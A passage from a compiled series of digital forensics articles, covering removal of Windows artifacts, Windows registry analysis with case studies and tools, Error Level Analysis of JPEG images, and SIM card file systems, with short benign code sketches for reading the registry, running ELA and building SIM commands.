Analyzer’s interface. In Figure 2, we see Index.dat Analyzer ready to remove entries in an IE’s index.dat file. Index.dat Analyzer can remove an entry or numerous entries if you check them in the box on the left of the screen, or it can delete the whole index.dat file. Importantly, you can also view separate entries stored in the file, and you can add other index.dat files to the list of entries. In this particular picture, we see that each Skype contact’s avatar is stored in the index.dat file. This particular index.dat file has 5209 entries although IE has been left largely unused on the given machine. 
There may be index.dat files that are not related to Internet Explorer but to other programs, and there may be several index.dat files for IE, depending on whether their purpose is storing the browser's history, cache, or cookies. After deletion, index.dat will be created again, but its contents will start from blank, so any sensitive data in it will be lost. Figure 3 – A view of an entry of Index.dat's cache of an image originating from Facebook Pagefile.sys is a hidden file that is used when the user has used up the existing RAM on his machine; it serves as a virtual memory file. It is basically resorted to when Windows needs more memory, in which case it turns to the HDD in the form of pagefile.sys for more space and, because the hard drive is much slower than RAM, running many programs at once would cause the system to slow down. What it does is that, when an application is taking too much memory, the least-used data in RAM gets placed into pagefile.sys so there is more memory for the programs that you are actually working with. Thus, if you get rid of it and you have insufficient RAM, the processes and programs that you are running are going to break down without giving you time to save or do anything, among other issues that may arise. You may try to disable pagefile.sys, delete it, and enable it again to recreate it, but this is somewhat pointless, as explained below. Similarly to hiberfil.sys, pagefile.sys stores processes that were running in your RAM at a given time, though the difference is that pagefile.sys does not store everything that was in your RAM at a given moment. To disable paging, go to Start -> Control Panel -> System -> Advanced system settings -> click on the Advanced tab -> Performance -> Settings -> go to the "Advanced" tab -> Virtual Memory -> Change -> pick a system drive and choose "No paging file", followed by the OK/Apply button. Finally, restart the machine. Note that pagefile.sys is quite important for decent system performance and there might be no need to reset its contents, as pagefile.sys goes through constant changes as you use your computer. Furthermore, users can minimize metadata. The process is easy for MS Office applications like Excel, PowerPoint, and Word. The user simply clicks File -> Check for Issues -> Inspect Document, inspects the document for metadata, and deletes the parts that he wants to get rid of. Figure 4: Checking a Word document for available metadata Figure 5: Using MS Word's Document Inspector to remove the file's metadata Lastly, there are gazillions of tools that promise to permanently remove data from your HDD by overwriting it numerous times. Examples are Eraser, SDelete, and Evidence Eliminator, among many others. We have restricted ourselves at this point to discussing the removal of several artifacts, but others can also be removed, to some extent, by cyber-criminals.
Conclusion
It can be concluded from our discussion so far that Windows users leave a lot of tracks on their machines when they perform their daily chores. These tracks can be extracted by forensic analysts and utilized as evidence. Fortunately, few cyber-crooks manage to erase all of them from their machines, and even fewer know about all of these potential tracks. Lastly, it can be inferred from the context of our discussion that even people who sell their second-hand computers on eBay should be cautious, because sensitive information can easily be leaked to curious buyers.
References: Cory Altheide and Harlan Carvey, “Digital Forensics with Open Source Tools,” 2011 John Sammons, “The Basics of Digital Forensics,” 2012 Windows, “Sleep and hibernation: frequently asked questions.” Available at: Sleep and hibernation: frequently asked questions Where is your data, “What is unallocated space?” Available at: What is unallocated space? | Where is Your Data? Wikipedia, “Hibernation.” Available at: Hibernation (computing) - Wikipedia, the free encyclopedia rhiannon, “What are Thumbs.db Files and Can I Delete Them?” Available at: What are Thumbs.db Files and Can I Delete Them? (Windows) Bill Detwiler, “Delete Hiberfil.sys by disabling Windows Hibernate function.” Available at: Delete hiberfil.sys by disabling Windows Hibernate function - TechRepublic Wikipedia, “Index.dat.” Available at: index.dat - Wikipedia, the free encyclopedia n|u – The Open Security Community, “Windows Forensic Artifacts.” Available at: Windows forensic artifacts Lifehacker.com, “Understanding the Windows Pagefile and Why You Shouldn’t Disable It.” Available at: Understanding the Windows Pagefile and Why You Shouldn't Disable It Jeff Hamm, “Carve for Records, Not Files.” Available at: http://computer-forensics.sans.org/summit-archives/2012/carve-for-record-not-files.pdf Source
  9. Introduction
Learning about artifacts in Windows is crucial for digital forensics examiners, as Windows accounts for most of the traffic in the world (91.8% of traffic comes from computers using Windows as their operating system, as of 2013), so examiners will most likely encounter Windows and will have to collect evidence from it in almost all cyber-crime cases. Below, we will discuss several places from which evidence may be gathered and ways to collect information from Windows. Windows actually provides a great abundance of artifacts, and being aware of these artifacts is helpful not only for examiners but also for companies and individuals (just to name a few reasons) trying to permanently and irrevocably erase sensitive information or perform informal investigations. Before we start, we have to mention that collecting evidence is not the sole challenge for examiners; the challenge is to locate, identify, collect, preserve, and interpret the information, and collecting it is only one piece of the puzzle. In this paper, we will only be able to catch a glimpse of this wealth of artifacts, but its forensic significance will be immediately unveiled to us.
The things you will find in this article
In the first part of this series we are going to discuss the Windows registry, its structure, backups and supporting files, examples from case files which reveal how instrumental the registry can be in prosecuting suspects, and some open source tools.
Registry
What is the Windows registry and what is its structure?
The Windows registry is an invaluable source of forensic artifacts for all examiners and analysts. The registry holds configuration data for Windows and is a substitute for the .INI files of Windows 3.1. It is a binary, hierarchical database, and some of its contents include configuration settings and data for the OS and for the different applications relying on it. The registry not only keeps records of OS and application settings, but it also monitors and records user-specific data in order to structure and enhance the user's experience during interactions with the system. Most of the time, users do not interact with the registry in a straightforward manner; they interact with it indirectly via installation routines, applications, and programs, such as Microsoft Installer files. Nonetheless, system admins have the capability of interacting directly with the registry via regedit.exe (the registry editor) that comes with all varieties of Windows. Figure 1: What the Windows registry looks like through the eyes of the registry editor, along with the registry's nomenclature. Figure 1 gives the impression that the structure of the registry is the familiar folder-based one, but this is merely an abstraction designed by the registry editor. In reality, the registry is just a collection of files located on the user's hard drive. The registry files in charge of the system and the applications on the user's machine are located in C:\Windows\system32\config, while the registry files holding data related to the user and his application settings, ntuser.dat and usrclass.dat, are located in the Windows user profile directory. Furthermore, Figure 1 reveals that the binary structure of the registry is based on cells, the notable ones being keys and values. Although additional cell types exist, it can be said that they act as pointers to other keys (subkeys) and values. Values encompass data and do not point to other keys.
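For a quick, hands-on look at keys and values, the standard Python winreg module (mentioned again in the tools section below) can walk a live registry; the key path here is only an example, and any key the account can read will do:
import winreg

# Open a key on a live Windows system, report its counts and last-write time, and list its values.
path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
    num_subkeys, num_values, last_write = winreg.QueryInfoKey(key)
    # last_write is a FILETIME-style value: 100-nanosecond intervals since 1 January 1601.
    print("subkeys:", num_subkeys, "values:", num_values, "last write:", last_write)
    for i in range(num_values):
        name, data, reg_type = winreg.EnumValue(key, i)
        print(name, reg_type, data)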
Registry hives and their supporting files as a useful additive for forensic analysts
Keys, subkeys, and values are typically part of different hives, which are logical groups of the former and have a set of supporting files that encompass backups of their data. User profile hives can be found under the HKEY_USERS key and they store registry data specific to the user's application settings, desktop, and environment, as well as holding data related to his/her printer(s) and network connections. Each user on a machine has his/her own hive, which is responsible for his/her user profile. Below, we have enumerated some extensions of supporting files and have shown what information to expect from a file with that extension:
No extension = a thorough replica of the hive's data.
Extension .alt = a duplicate of the HKEY_LOCAL_MACHINE\System hive. It should be noted that the System key is the sole key whose backup files use this file extension, as it is a crucial hive.
Extension .log = a record of modifications to the hive's keys and values.
Extension .sav = a backup replica of a hive.
After discussing the types of supporting files and what data they hold, we can move on to show what file names the supporting files of the standard hives have. Below is a graphic (Figure 2) that illustrates the standard hives and their supporting files.
Points of interest for forensic analysts in the registry's key cell structure
Deleting a registry key does not make it "go" somewhere; rather, it causes the key's size value to be set to a positive one, while undeleted keys have a negative value. Essentially, the space consumed by the registry key gets labeled as available and it becomes possible to overwrite it. From the point of view of a signed integer, a registry key has a negative size value, but from a hexadecimal point of view the key structure is indeed positive. The code unpack("l", $dword) may be employed in Perl to parse the DWORD value as a signed integer. Keys contain the useful LastWrite time, which pinpoints when the last modification of the key took place. A modification may consist of changes to an existing subkey or value, the deletion of existing subkeys or values, or the creation of new ones. Figure 3 reveals the most notable key cell structure elements from the point of view of a forensic analyst. Their size in bytes and their offset are also included in the illustration. Some preliminary information: registry keys typically begin with a four-byte double word that contains the size of the particular key. After the double word, there is a key node identifier, "nk", which tells us that what we are looking at is a key and not a value. Subsequently, there is a two-byte value that reveals the node type: 0x2C indicates a root key cell, whereas 0x20 indicates an ordinary key cell. The LastWrite time is actually "a 64-bit FILETIME object that marks the number of 100-nanosecond epochs since midnight of 1 January 1601," but it can be perceived as equivalent to the time when the file was last changed, since it reveals when a modification was made to the key. An offset pinpoints the distance between the start of an object and a particular point or element, usually within the same object.
Registry case study
Below, we will be looking at two cases in which the registry proved instrumental.
Credit card theft
The Windows registry helped law enforcement solve a credit card case in Houston, Texas.
The suspects were a man and his wife who bought goods from the Internet with pilfered credit card numbers. They were detained as a result of a controlled drop of commodities ordered from the Internet. When ntuser.dat, the registry, and the protected storage system provider were scrutinized, a list of numerous names, addresses, and credit card numbers were found. It turned out that the information in the list was applied online to purchase goods as well, and after an additional investigation it was concluded that these credit card numbers were used illegally, without any permission from their owners. The data retrieved from the registry was sufficient to exact more search warrants which led to the arrest of 22 persons and the retrieval of illegally bought goods worth more than $100,000. The development of the events turned out to be the following: All defendants pled guilty to organized crime accusations and served time in jail, which may have not been possible without the help of the Windows registry. Child pornography Guests at a hotel located in a little town near Austin, Texas, called the law enforcement authorities after seeing a person, who looked intoxicated, walking around the hotel naked. When the law enforcement officials arrived after the 911 call they located the individual and concluded that he was, in fact, staying at that hotel so they escorted him to his room and there they discovered that he was staying with another person—but what surprised them was that a picture of child pornography was being projected on the wall. The picture was projected through a laptop that had a projector attached to it. In close proximity to the laptop, there were two external hard drives. The individual who was already in the room was surprised by the entry of the police and he asserted that the laptop was his but that the external drives belonged to his intoxicated fellow and had nothing to do with him. The equipment was immediately confiscated and sent for analysis. Forensic clones were created from the laptop and the two external hard drives without delay. The initial analysis of the external hard drives revealed the existence of pictures and movies of child pornography on them. Consequently, the forensic analysts had to find out whether any of these external drives were connected to the laptop of the individual asserting that he had nothing to do with them. Thus, the laptop’s system registry file was examined to match any entries in the USBStor key with the external drives. This turned out to be a fruitful examination, as listings for the external drives were found as well as their hardware serial numbers. Following these steps, the forensic analysts had to determine whether their results were authentic, so they linked the suspect’s external drives to their lab’s computer system, using a freshly installed version of Windows. To avert any alteration to the clones of the EHDs a write blocker was linked between the two drives and the system. Lastly, they examined the clone’s system registry file and the USBStor keys and came to the same conclusion, that the EHDs listings were identical to the defendant’s, in addition to having the same hardware serial numbers, and this proved that at some point in time the EHDs were connected to the suspect’s laptop. Ultimately, the culprit was sentenced for possessing child pornography. Using open source tools for the examination of the Windows Registry. 
Modules The Win32::TieRegistry is a Perl module that digs out data not only from local systems but also from remote ones. It can be used on live Windows systems. Equivalent to this is the Python module winreg, which is presented for the achievement of the same goal. However, tools like Win32::TieRegistry are not cross-platform and will not work on default OS X or Linux installations, as they depend on the native Windows API. There are many Perl scripts that take advantage of the Win32::TieRegistry Perl module, such as regscan.pl. You may also want to create your own Perl scripts that will collect the LastWrite time from the registry hives so you can sort and parse the information in any way you like. Considering you have images collected from the system, the Perl module Parse::Win32Registry seems like a good choice, partially because it is cross-platform. The Win32::TieRegistry rests on the shoulders of the API offered by Windows systems and grants us entry into the registry information on the live systems, while the Parse::Win32Registry module retrieves hive files in their binary form and gives us a level of abstraction that enables us to open a registry value simply by procuring the module with a key path like “Software/Python/PythonCore/3.3/Modules.” Brief overview of some open source tools F-Response is a software utility that allows examiners to “conduct live forensics, data recovery, and eDiscovery over an IP network using their tool(s) of choice.” If you resort to this utility as a means of widening the scope of your incident response range and capacity, you can be misled into thinking that you are intermingling with a live system when, in fact, while utilizing F-Response you will be communicating with hive files in a binary form; therefore, tools based on the Parse::Win32Registry will be handier than tools based on the Win32::TieRegistry module. A tool that that is very beneficial in investigations is RegRipper, which not only parses registry hives extracted from images but also parses registry hives extracted from within a mounted image and from a system that was entered through F-Response’s application. RegRipper bases its dealings with the registry hive files on the Parse::Win32Registry module. It operates through plugins that are tiny files comprising Perl code, which pull out various types of information. rr.pl is the main script of the application, which can be categorized as a GUI interface to a motor that handles all those plugins. The application can be launched in a Linux environment on which WINE has been installed and it comes in various Linux-centered and forensic-based toolkits such as PlainSight. RegRipper also contains a command line interface tool named rip.pl that makes it possible for examiners to execute particular plugins against a hive or run listings of plugins (as they can do with RegRipper’s GUI – rr.pl). If you are searching for a way in which to obtain concrete data out of a hive or to test recently produced plugins, Rip.pl comes in handy. Several scripts were created to exploit the property of registry keys that they do not go away after deletion. Such an exploit, if it is appropriate to name it so, is a Perl script that was made in 2008 and got the name Regslack. Regslack parses through hive files and recovers removed keys. 
Conclusion This article is a part of a series, “Windows System Artifacts in Digital Forensics.” and objects of examination in the consecutive articles will be Windows file systems, registry, shortcut files, hibernation files, prefetch files, event logs, Windows executables, metadata, recycle bin, print spooling, thumbnail images, and lists of recently used applications, along with a brief discussion of how to find removed information and how to work with restore points and shadow copies. Note that most of the abovementioned artifacts are Windows-specific and are unique to this operating system. Further reading: Carvey, Harlan, “Windows Registry Forensics: Advanced Digital Forensic Analysis of the Windows Registry,” 2011 References: Bott Ed, “Latest OS share data shows Windows still dominating in PCs,” 2013. Available at: Latest OS share data shows Windows still dominating in PCs | ZDNet Windows Dev Center, “Registry Hives.” Available at: Registry Hives (Windows) Wikipedia, “Windows Registry.” Available at: Windows Registry - Wikipedia, the free encyclopedia F-Response, available at: https://www.f-response.com/ Microsoft Support, “Windows registry information for advanced users.” Available at: http://support.microsoft.com/kb/256986 Cory Altheide & Harlan Carvey, “Digital Forensics with Open Source Tools,” 2011 Sammons John, “The Basics of Digital Forensics: The Primer for Getting Started in Digital Forensics,” 2012
  10. Introduction
Error Level Analysis is a forensic method for identifying portions of an image that have a different level of compression. The technique can be used to determine whether a picture has been digitally modified. To better understand the technique, it's necessary to look more closely at JPEG compression. JPEG (Joint Photographic Experts Group) is a method of lossy compression for digital images. It's a data encoding algorithm that compresses data by discarding (losing) some of it. The level of compression can be chosen as a reasonable compromise between picture size and image quality. JPEG compression is usually around 10:1. The JPEG algorithm works on image grids, compressed independently, having a size of 8×8 pixels. The 8×8 dimension was chosen after numerous experiments with other sizes: matrices larger than 8×8 are harder to manipulate mathematically or are not supported by hardware, while matrices smaller than 8×8 don't contain enough information, resulting in poor-quality compressed images. For images that have not been digitally modified, all 8×8 grids should show a similar error level when the picture is resaved. Each square should degrade at approximately the same rate, due to the introduction of a homogeneous amount of error across the entire image. In a modified image, the altered grid should show a higher error potential with respect to the remaining part of the image.
Image manipulation and analysis
In August 2007, Dr. Neal Krawetz gave an interesting presentation at the Black Hat conference titled "A Picture's Worth," about determining whether a picture is real or a computer modification. Error Level Analysis (ELA) is one of the simpler methods presented by the researcher. In 2010, Pete Ringwood created the "errorlevelanalysis.com" website as a free service where people could submit photos and web pictures for analysis. The site was later closed. Hacker Factor has recreated the service as "fotoforensics.com." It's free and allows any user to perform ELA analysis on their own photos. The methods for analyzing images presented by Krawetz are: observation, basic image enhancements, image format analysis, and advanced image analysis.
ELA
Error Level Analysis is a very useful method, belonging to advanced image analysis, for detecting the manipulation of images. ELA works by re-saving the image at 95% compression and evaluating the difference with the original. Modified areas are easily seen due to their characteristic appearance in the ELA representation. The main methods used for picture analysis are based on the following clues:
Shadows - Analyze the shadows related to different objects in the picture, evaluating them in relation to the direction of the light source.
Eyes - Zoom in and compare against other eyes (dots/colors give the light direction).
EXIF - Evaluation of EXIF file data, including GPS position, time and RGB color profile changes.
Reflections - Check that the reflections within the image are coherent.
The principal free tools are:
FotoForensics Photo ELA Error Level Analysis Image Tool FotoForensics
Jeffrey's Exif Viewer Online EXIF data and GPS viewer analyzer http://regex.info/exif.cgi
JPEGsnoop Fake image detection via image signature analysis JPEGsnoop | SourceForge.net
IEXIF 2 Iexif is a professional Exif viewer in Windows Exif viewer : Opanda IExif - Professional EXIF / GPS / IPTC Viewer & Editor in Windows, IE & Firefox
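As a rough sketch of the re-save-and-compare idea described above (assuming the Pillow imaging library; the file names and the brightness factor are just examples), ELA can be approximated in a few lines of Python:
from PIL import Image, ImageChops, ImageEnhance

def error_level_analysis(path, quality=95, scale=20):
    # Resave the picture as JPEG at the given quality, take the per-pixel difference with
    # the original and brighten it so the differences become visible.
    original = Image.open(path).convert("RGB")
    original.save("resaved.jpg", "JPEG", quality=quality)
    resaved = Image.open("resaved.jpg")
    diff = ImageChops.difference(original, resaved)
    return ImageEnhance.Brightness(diff).enhance(scale)

# error_level_analysis("suspect.jpg").save("suspect_ela.png")
Online services such as FotoForensics do essentially the same thing, with extra handling for formats, sizes and rendering.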
Image compression – the mapper
Every computer image is composed of pixels made of three colors: red, green, and blue (RGB). The color value of a pixel is represented with a byte (0-255). The mapper (aka decoder) converts the RGB color space to the YCbCr color space, where Y is the luminance and Cb and Cr are the chrominance-blue and chrominance-red color portions. In the YCbCr color space, most of the image data is carried by the Y component, while Cb and Cr carry the color information. Figure – YCbCr representation
The principle behind ELA
Error Level Analysis evaluates the quality level of the 8×8 grid squares within the image. They show an increasing degree of error during successive resave operations. The phenomenon is obvious if images aren't optimized for a specific camera quality level. Subsequent resaves reduce the error level potential, producing a darker ELA. After a number of resaves, a grid square reaches its minimum error level.
The Image Error Level Analyzer
The Image Error Level Analyzer is an online tool that implements an ELA algorithm. By using it, it's possible to rapidly discover image manipulation. The web tool is based on the Python Image Library and the libjpeg library (v6.2.0-822.2). The verification process consists of successive resaves of the image at a predefined quality; the resulting picture is compared with the original one. If an image hasn't been manipulated, all its parts have been saved the same number of times; images that are composed of portions from other sources, or that have simply been manipulated, will show different levels of error, visible in the ELA representation as different colors. The authors of the website also developed a Firefox plugin that enables users to analyze an image by simply right-clicking on any image on the internet. With the ELA method, it's possible to discover image modification by establishing a chronological order of changes to various parts of the image: the lighter parts have been edited most recently, while the most opaque have been saved several times. The tool accepts images of limited size, allowing submissions up to 1224 pixels per side.
The test
The first step is the generation of an ELA image. Upload an image to FotoForensics, or simply provide its URL. Figure – ELA web tool After pressing the "Process" button, users are redirected to a page containing the original image and the ELA. Let's start with the original image: Figure – Original Image Then modify it by introducing a stack of coins and changing the appearance of the toad: Figure – Altered image At this point, let's submit the picture to the online service to generate the following ELA representation. Figure – ELA image The sections that are black correspond to the parts that usually aren't manipulated. Solid white blocks usually represent the same. Solid colors present a good level of compression with minimal error levels, displayed as darker areas in the image. ELA highlights the altered portions of the image, which show higher ELA values and a bright white color. Note that the outlines of objects and high-frequency areas usually have higher ELA values than the rest of the image. In the following image, the text of the books stands out because the contrast creates a high-frequency edge. "In general, you should compare edges with edges and surfaces with surfaces. If all surfaces except one have similar ELA values, then the outlier should be suspect." Another interesting example is provided by the Hacker Factor Blog (Hacker Factor: Home Page), this time with an allegedly winning lottery ticket under analysis.
ELA shows that the image has been modified: the digit "4" has been inserted into the "04" and the "46", and both "23" values were altered. The tool can give false-negative results when different portions of the image have been resaved the same number of times; in that case, all the areas present the same degree of error. There are some limitations to consider when conducting an ELA analysis. The technique operates on JPEG images based on a grid, and changes to a portion of a grid affect the entire grid square. That makes it impossible to identify the exact pixel that was modified. ELA can't detect single-pixel modifications or minor color adjustments. Scaling and recoloring the picture impacts the entire image, introducing a greater error level potential. Another element of noise for ELA is the presence of high-contrast colors within the same grid, for example black and white, which generate high ELA values. This anomaly is attributable to the fact that JPEG uses the YUV color space representation. Thanks to ELA analysis, it's possible to discover whether an image is the result of a conversion from another format. For example, if a non-JPEG image contains visible grid lines (1-pixel wide, in 8×8 squares), it means the picture was originally a JPEG that was later converted to a non-JPEG format. Another interesting case in the ELA literature is that of an image converted from the PNG format to JPEG, where ELA analysis produces very high levels of error on edges and textures, appearing as a prevalence of dark or black coloring. A conversion from JPEG to PNG is lossless and will retain the JPEG artifacts.
The rainbowing technique
Rainbowing indicates the visible separation between the luminance and chrominance channels, appearing as blue, purple and red. Rainbowing evaluation is possible because JPEG separates colors into luminance and chrominance channels. The luminance is the gray-scale intensity of the image, while the chrominance-red and chrominance-blue components identify the amount of coloring, independent of the full color's intensity. Picture modification with tools such as Photoshop or Gimp can introduce a distinct rainbowing pattern on surfaces that have near-uniform coloring. High-quality camera photos may also include a rainbowing effect along uniformly colored surfaces. Photoshop and other Adobe products introduce a large amount of rainbowing, unlike other tools such as Microsoft Paint, which don't. Beware that the presence of rainbowing may only mean that an Adobe product, like Photoshop or Lightroom, was used to save the image; it may not represent proof of intentional image alteration.
A controversial case
During the last World Press Photo Awards, World Press Photo said that Paul Hansen's photo of mourners in Gaza was "retouched with respect to both global and local color and tone," while maintaining that there was no evidence of manipulation. Experts using ELA analysis were able to demonstrate a meaningful rainbowing effect (faint red and blue patches), and the presence of higher ELA values on edges and textures was probably caused by Photoshop's unintentional auto-sharpening. Figure – Original image Figure – ELA The rainbowing effect is clearly visible in various portions of the image, such as the sky, the walls, and the people. Another source of information is the metadata; analyzing it makes it possible to evaluate the congruence of the lighting in the image. In this specific case, the photo was taken in the morning in November in the northern hemisphere, when the sun should be low on the horizon.
The strong shadows on the left building allowed an expert to draw lines that intersect in the general direction of the sun. The sun wasn't quite low, but perhaps the reported time was wrong; in any case, the lighting on the people doesn't match the sun's position. "The people should have dark shadows on their right sides (the left side of the photo), but their facial lighting does not match the available lighting." According to the experts who analyzed the photo, it's likely that the photographer took a series of photos and combined a few of them, altering some aspects of the image.
Conclusion
Although its proper application can allow experts to easily discover image modification (including scaling, cropping and resave operations), ELA analysis depends on the quality of the image. Working on a picture that has gone through numerous resave operations isn't effective: if an image is resaved numerous times, it may reach its minimum error level, where further resaves no longer alter the image. ELA will then return a black image, and no modifications may be detected. The technique is very effective at discovering alterations introduced with tools like Photoshop or Gimp; just saving a picture with these applications introduces a higher error level potential in the image. The downside is that these tools can also be the cause of unintentional modification. Keep in mind when analyzing any picture that ELA is just one algorithm for analyzing images. Although it's very efficient under specific conditions, it should be integrated with other forensic tools to provide valid results.
References
Joint Photographic Experts Group - Wikipedia, the free encyclopedia
Nick's Blog: Image Compression: How JPEG Works
The Hacker Factor Blog
http://www.hackerfactor.com/papers/bh-usa-07-krawetz-wp.pdf
World Press Photo: 'No evidence of significant photo manipulation' in award-winning shot | Poynter
Tech Talk @ N3TLab.com: Photo ELA Error Level Analysis - Detecting Fake Images
https://sites.google.com/site/elsamuko/forensics/ela
FotoForensics
Image Forensics: Error Level Analysis
Error Level Analysis
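As an appendix to the discussion above, the resave-and-compare step that ELA is built on can be sketched in a few lines of PHP using the GD extension. This is only an illustration under stated assumptions (GD available, a readable JPEG input, an arbitrary 95% resave quality and 20x amplification), not the FotoForensics implementation; the file names are hypothetical.

<?php
// Minimal ELA-style sketch using GD (illustration only, not the FotoForensics code).
// Assumes the GD extension and a readable JPEG; quality and scale are arbitrary choices.
function elaSketch($inputPath, $outputPath, $quality = 95, $scale = 20) {
    $original = imagecreatefromjpeg($inputPath);
    if ($original === false) {
        die("Could not open $inputPath\n");
    }

    // 1. Resave once at a known quality level and reload the result.
    $tmp = tempnam(sys_get_temp_dir(), 'ela') . '.jpg';
    imagejpeg($original, $tmp, $quality);
    $resaved = imagecreatefromjpeg($tmp);

    // 2. The ELA image is the amplified per-channel difference between the two versions.
    $w = imagesx($original);
    $h = imagesy($original);
    $ela = imagecreatetruecolor($w, $h);
    for ($y = 0; $y < $h; $y++) {
        for ($x = 0; $x < $w; $x++) {
            $a = imagecolorat($original, $x, $y);
            $b = imagecolorat($resaved, $x, $y);
            $r  = min(255, abs((($a >> 16) & 0xFF) - (($b >> 16) & 0xFF)) * $scale);
            $g  = min(255, abs((($a >> 8) & 0xFF)  - (($b >> 8) & 0xFF))  * $scale);
            $bl = min(255, abs(($a & 0xFF)         - ($b & 0xFF))         * $scale);
            imagesetpixel($ela, $x, $y, imagecolorallocate($ela, $r, $g, $bl));
        }
    }

    imagepng($ela, $outputPath);   // bright blocks = high error level, dark = near minimum
    unlink($tmp);
}

elaSketch('toad.jpg', 'toad-ela.png');   // hypothetical file names

Blocks that barely change on resave come out dark (they are already near their minimum error level), while recently edited or pasted regions come out bright, which is exactly the behaviour described above.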
  11. The SIM (subscriber identity module) is a fundamental component of cellular phones. It also known as an integrated circuit card (ICC), which is a microcontroller-based access module. It is a physical entity and can be either a subscriber identity module (SIM) or a universal integrated circuit card (UICC). A SIM can be removed from a cellular handset and inserted into another; it allows users to port identity, personal information, and service between devices. All cell phones are expected to incorporate some type of identity module eventually, in part because of this useful property. Basically, the ICC deployed for 2G networks was called a SIM and the UICC smart card running the universal subscriber identity module(USIM) application. The UICC card accepts only 3G universal mobile telecommunications service (UMTS) commands. USIMs are enhanced versions of present-day SIMs, containing backward-compatible information. A USIM has a unique feature in that it allows one phone to have multiple numbers. If the SIM and USIM application are running on the same UICC, then they cannot be working simultaneously. The first SIM card was about the size of a credit card. As technology developed, the cell phone began to shrank in size and so did the SIM card. The mini-SIM card, which is about one-third the size of a credit card. But today we are using smartphones that use micro-SIM, which is smaller than mini-SIM. These SIM cards vary in size but all have the functionality for both the identification and authentication of the subscriber’s phone to its network and all contain storage for phone numbers, SMS, and other information, and allow for the creation of applications on the card itself. SIM Structure and File Systems A SIM card contains a processor and operating system with between 16 and 256 KB of persistent, electronically erasable, programmable read-only memory (EEPROM). It also contains RAM (random access memory) and ROM (read-only memory). RAM controls the program execution flow and the ROM controls the operating system work flow, user authentication, data encryption algorithm, and other applications. The hierarchically organized file system of a SIM resides in persistent memory and stores data as names and phone number entries, text messages, and network service settings. Depending on the phone used, some information on the SIM may coexist in the memory of the phone. Alternatively, information may reside entirely in the memory of the phone instead of available memory on the SIM. The hierarchical file system resides in EEPROM. The file system consists of three types of files: master file(MF), dedicated files, and elementary files. The master file is the root of the file system. Dedicated files are the subordinate directories of master files. Elementary files contain various types of data, structured as either a sequence of data bytes, a sequence of fixed-size records, or a fixed set of fixed-size records used cyclically. As can be seen in the above figure, dedicated files are subordinate directories under the MF, their contents and functions being defined by the GSM11.11 standards. Three are usually present: DF (DCS1800), DF (GSM), and DF (Telecom). Also present under the MF are EFs (ICCID). Subordinate to each of the DFs are supporting EFs, which contain the actual data. The EFs under DF (DCS1800) and DF (GSM) contain network-related information and the EFs under DF (Telecom) contain the service-related information. All the files have headers, but only EFs contain data. 
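To make the MF/DF/EF navigation more concrete: under GSM 11.11, a tool selects each file in the hierarchy with a SELECT APDU (class 0xA0, instruction 0xA4) carrying the two-byte file identifier. The sketch below only builds and prints those command bytes for a walk from the MF to DF Telecom to EF ADN; the file IDs are the standard ones from the specification (verify against GSM 11.11 before relying on them), and no card-reader transport is included, so treat it as an illustration rather than acquisition code.

<?php
// Sketch: building GSM 11.11 SELECT APDUs to walk MF -> DF(Telecom) -> EF(ADN).
function selectApdu($fileId) {
    // CLA=A0 (GSM), INS=A4 (SELECT), P1=00, P2=00, Lc=02, data = 2-byte file ID
    return [0xA0, 0xA4, 0x00, 0x00, 0x02, ($fileId >> 8) & 0xFF, $fileId & 0xFF];
}

$path = [
    'MF'         => 0x3F00,  // master file (root)
    'DF Telecom' => 0x7F10,  // service-related dedicated file
    'EF ADN'     => 0x6F3A,  // abbreviated dialing numbers (phonebook)
];

foreach ($path as $name => $fid) {
    $apdu = selectApdu($fid);
    printf("SELECT %-10s : %s\n", $name,
        implode(' ', array_map(fn($b) => sprintf('%02X', $b), $apdu)));
    // A real tool would transmit each APDU to the reader here, check the SW1/SW2
    // status words, and then issue READ BINARY / READ RECORD to pull the data.
}

With a PC/SC library, the same bytes would be sent to the reader and followed by read commands; that is essentially what tools like pySIM (discussed later) automate.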
The first byte of every header identifies the file type and the header contains the information related to the structure of the files. The body of an EF contains information related to the application. Files can be either administrative- or application-specific and access to stored data is controlled by the operating system. Security in SIM SIM cards have built-in security features. The three file types, MF, DF, and EF, contain the security attributes. These security features filter every execution and allow only those with proper authorization to access the requested functionality. There are different level of access conditions in DF and EF files. They are: Always—This condition allows to access files without any restrictions. Card holder verification 1 (CHV1)—This condition allows access to files after successful verification of the user’s PIN or if PIN verification is disabled. Card holder verification 2 (CHV2)—This condition allows access to files after successful verification of the user’s PIN2 or if the PIN2 verification is disabled. Administrative (ADM)—The card issuer who provides SIM to the subscriber can access only after prescribed requirements for administrative access are fulfilled. Never (NEV)—Access of the file over the SIM/ME interface is forbidden. The SIM operating system controls access to an element of the file system based on its access condition and the type of action being attempted. The operating system allows only limited number of attempts, usually three, to enter the correct CHV before further attempts are blocked. For unblocking, it requires a PUK code, called the PIN unblocking key, which resets the CHV and attempt counter. If the subscriber is known, then the unblock CHV1/CHV2 can be easily provided by the service provider. Sensitive Data in SIM The SIM card contains sensitive information about the subscriber. Data such as contact lists and messages can be stored in SIM. SIM cards themselves contain a repository of data and information, some of which is listed below: Integrated circuit card identifier (ICCID) International mobile subscriber identity (IMSI) Service provider name (SPN) Mobile country code (MCC) Mobile network code (MNC) Mobile subscriber identification number (MSIN) Mobile station international subscriber directory number (MSISDN) Abbreviated dialing numbers (ADN) Last dialed numbers (LDN) Short message service (SMS) Language preference (LP) Card holder verification (CHV1 and CHV2) Ciphering key (Kc) Ciphering key sequence number Emergency call code Fixed dialing numbers (FDN) Local area identity (LAI) Own dialing number Temporary mobile subscriber identity (TMSI) Routing area identifier (RIA) network code Service dialing numbers (SDNs) These data have forensics value and can be scattered from EF files. Now we will discuss some of these data. A. Service Related Information ICCID: The integrated circuit card identification is a unique numeric identifier for the SIM that can be up to 20 digits long. It consists of an industry identifier prefix (89 for telecommunications), followed by a country code, an issuer identifier number, and an individual account identification number. Twenty-digit ICCIDs have an additional “checksum” digit. One example of the interpretation of a hypothetical nineteen digit ICCID (89 310 410 10 654378930 1) is shown below. Issuer identification number (IIN) is variable in length up to a maximum of seven digits: The first two digits are fixed and make up the Industry Identifier. “89? 
